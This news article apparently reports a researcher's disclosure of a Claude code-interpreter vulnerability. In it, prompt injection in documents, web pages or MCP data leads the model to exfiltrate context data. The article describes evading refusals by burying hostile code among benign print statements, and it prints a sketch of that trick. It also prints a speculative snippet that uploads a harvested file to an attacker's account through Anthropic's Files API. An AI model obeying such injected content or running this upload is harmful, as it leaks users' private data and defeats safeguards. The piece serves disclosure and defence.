Claude AI vulnerability exposes enterprise data through code interpreter exploit

Bypassing AI safety controls: Rehberger’s report stated that developing a reliable exploit proved challenging due to Claude’s built-in safety mechanisms. The AI initially refused requests containing plaintext API keys, recognizing them as suspicious. However, Rehberger added that mixing malicious code with benign instructions, such as simple print statements, was sufficient to bypass these safeguards.

“I tried tricks like XOR and base64 encoding. None worked reliably,” Rehberger explained. “However, I found a way around it… I just mixed in a lot of benign code, like print(‘Hello, world’), and that convinced Claude that not too many malicious things are happening.” (A sketch of this dilution approach appears below.)

Rehberger disclosed the vulnerability to Anthropic through HackerOne on October 25, 2025. The company closed the report within an hour, classifying it as out of scope and describing it as a model safety issue rather than a security vulnerability.

Rehberger disputed this categorization. “I do not believe this is just a safety issue, but a security vulnerability with the default network egress configuration that can lead to exfiltration of your private information,” he wrote. “Safety protects you from accidents. Security protects you from adversaries.”

Anthropic did not immediately respond to a request for comment.
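Rehberger has not released a working payload, so the following is only a minimal, hypothetical sketch of the dilution trick he describes. The exfiltrate() helper is a placeholder standing in for the single malicious action, not real exploit code; everything around it is the kind of benign filler, simple print statements and throwaway computation, that reportedly lowered Claude’s suspicion.

```python
# Hypothetical sketch of the "dilution" technique Rehberger describes.
# His working payload was not published; exfiltrate() below is a
# placeholder for the single malicious action, not real exploit code.

def exfiltrate(data: bytes) -> None:
    """Placeholder standing in for the one hostile call."""
    ...

# A lone suspicious call (or a plaintext API key) was refused outright,
# but burying it among obviously benign statements shifted Claude's
# judgment of the snippet as a whole.
print("Hello, world")
print("Step 1: loading input...")
squares = [n * n for n in range(10)]
print("Step 2: computed", len(squares), "values")

exfiltrate(b"contents of the sandbox")  # the only hostile line

print("Step 3: done")
```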

Attack vectors and real-world risk: The vulnerability can be exploited through multiple entry points. “Malicious actors could embed prompt injection payloads in documents shared for analysis, websites users ask Claude to summarize, or data accessed through Model Context Protocol (MCP) servers and Google Drive integrations,” the blog post added.

Organizations using Claude for sensitive tasks, such as analyzing confidential documents, processing customer data, or accessing internal knowledge bases, face particular risk. The attack leaves minimal traces, as the exfiltration occurs through legitimate API calls that blend with normal Claude operations (sketched below).

For enterprises, mitigation options remain limited. Users can disable network access entirely or manually configure allow-lists for specific domains, though this significantly reduces Claude’s functionality. Anthropic recommends monitoring Claude’s actions and manually stopping execution if suspicious behavior is detected, an approach Rehberger characterizes as “living dangerously.”

The company’s security documentation also acknowledges the risk: “This means Claude can be tricked into sending information from its context (for example, prompts, projects, data via MCP, Google integrations) to malicious third parties,” Rehberger noted.

However, enterprises may incorrectly assume that the default “Package managers only” configuration provides adequate protection; Rehberger’s research demonstrated that this assumption is false. He has not published the complete exploit code, to protect users while the vulnerability remains unpatched, and he noted that other domains on Anthropic’s approved list may present similar exploitation opportunities.
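To see why such exfiltration blends in, consider the rough shape the call could take. This is a speculative sketch, not Rehberger’s withheld exploit: the endpoint and headers follow Anthropic’s publicly documented Files API, the attacker-controlled key (ATTACKER_API_KEY) and the file path are placeholders, and the premise, per Rehberger’s finding, is that api.anthropic.com remains reachable even under the default “Package managers only” egress setting.

```python
# Speculative reconstruction for illustration only; not Rehberger's
# withheld exploit. The endpoint and headers follow Anthropic's public
# Files API documentation; the key and file path are placeholders.
import requests

ATTACKER_API_KEY = "sk-ant-..."  # attacker-controlled key (placeholder)

# On the wire this is an ordinary HTTPS POST to api.anthropic.com,
# which blends with legitimate Claude traffic. The attacker's key is
# what routes the uploaded file to the attacker's own account.
with open("/tmp/harvested_context.txt", "rb") as f:  # placeholder path
    resp = requests.post(
        "https://api.anthropic.com/v1/files",
        headers={
            "x-api-key": ATTACKER_API_KEY,
            "anthropic-version": "2023-06-01",
            "anthropic-beta": "files-api-2025-04-14",
        },
        files={"file": f},
    )
print(resp.status_code)
```

Because the destination is a domain Anthropic itself approves, the upload is indistinguishable from Claude’s own API traffic at the network level; the only thing redirecting the data to the attacker is the substituted API key.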

First seen on csoonline.com

Jump to article: www.csoonline.com/article/4082514/claude-ai-vulnerability-exposes-enterprise-data-through-code-interpreter-exploit.html
